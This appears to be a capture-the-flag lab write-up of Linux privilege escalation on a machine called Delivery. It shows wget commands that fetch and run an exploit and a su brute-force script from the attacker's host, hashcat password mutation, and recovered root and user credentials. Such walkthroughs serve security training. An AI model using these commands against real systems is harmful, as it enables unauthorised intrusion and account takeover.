# Priv Esc

```
Youve_G0t_Mail!
```

```bash
maildeliverer@Delivery:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    /root/mail.sh
#

```

```bash
maildeliverer@Delivery:~$ wget http://10.10.14.18/sudodoom
--2025-02-23 15:05:49--  http://10.10.14.18/sudodoom
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2362 (2.3K) [text/plain]
Saving to: ‘sudodoom’

sudodoom                                        100%[=====================================================================================================>]   2.31K  --.-KB/s    in 0.01s

2025-02-23 15:05:49 (188 KB/s) - ‘sudodoom’ saved [2362/2362]

maildeliverer@Delivery:~$ chmod +x sudodoom

maildeliverer@Delivery:~$ ./sudodoom -i 10.10.14.18 -p 80

```

<figure><img src="https://2227792809-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLw94TQyn4rROgGvJT1nC%2Fuploads%2FrUeEOJEQIWIGED3Ls0WA%2Fimage.png?alt=media&#x26;token=7da45993-9f5c-4f79-b560-b93c3133fee7" alt=""><figcaption></figcaption></figure>

```
/dev/shm/pspy64
```

<figure><img src="https://2227792809-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLw94TQyn4rROgGvJT1nC%2Fuploads%2FyUhOrlfP6tvAjZvlf5HE%2Fimage.png?alt=media&#x26;token=b281cc9b-6d33-4fa2-9593-edf6cc4feead" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2227792809-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLw94TQyn4rROgGvJT1nC%2Fuploads%2FXvSn4m4EoIsLgSsUJYvP%2Fimage.png?alt=media&#x26;token=9fb2e357-6ae1-4ee6-8c92-52f8ec288dc7" alt=""><figcaption></figcaption></figure>

Put PleaseSubscribe! into pass.txt

```bash
 hashcat --force pass.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --stdout | sort -u > mut_password.list
```

{% embed url="<https://github.com/carlospolop/su-bruteforce>" %}

```bash
maildeliverer@Delivery:/dev/shm$ wget 10.10.14.18/suBF.sh && wget http://10.10.14.18:8080/mut_password.list && chmod +x suBF.sh
--2025-02-23 21:47:59--  http://10.10.14.18/suBF.sh
Connecting to 10.10.14.18:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2340 (2.3K) [text/x-sh]
Saving to: ‘suBF.sh’

suBF.sh                 100%[==============================>]   2.29K  --.-KB/s    in 0.008s

2025-02-23 21:47:59 (284 KB/s) - ‘suBF.sh’ saved [2340/2340]

--2025-02-23 21:47:59--  http://10.10.14.18:8080/mut_password.list
Connecting to 10.10.14.18:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62343 (61K) [application/octet-stream]
Saving to: ‘mut_password.list’

mut_password.list       100%[==============================>]  60.88K   329KB/s    in 0.2s

2025-02-23 21:47:59 (329 KB/s) - ‘mut_password.list’ saved [62343/62343]


```

<figure><img src="https://2227792809-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLw94TQyn4rROgGvJT1nC%2Fuploads%2F8WUVX6FkKN9dU7IAYow9%2Fimage.png?alt=media&#x26;token=aaab101a-1581-4c80-913c-97949adbb580" alt=""><figcaption></figcaption></figure>

```
root:PleaseSubscribe!21
```

<figure><img src="https://2227792809-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLw94TQyn4rROgGvJT1nC%2Fuploads%2FSHWHc5biJBF2vDtTpIhi%2Fimage.png?alt=media&#x26;token=d8984b4a-7349-48c3-a341-16e37a11d126" alt=""><figcaption></figcaption></figure>